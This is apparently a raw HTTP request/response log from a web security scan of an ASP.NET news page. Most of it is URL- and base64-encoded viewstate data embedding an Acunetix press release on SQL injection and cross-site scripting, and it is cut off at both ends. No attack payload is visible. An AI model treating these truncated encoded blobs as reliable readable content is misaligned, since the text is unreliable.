ICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgIC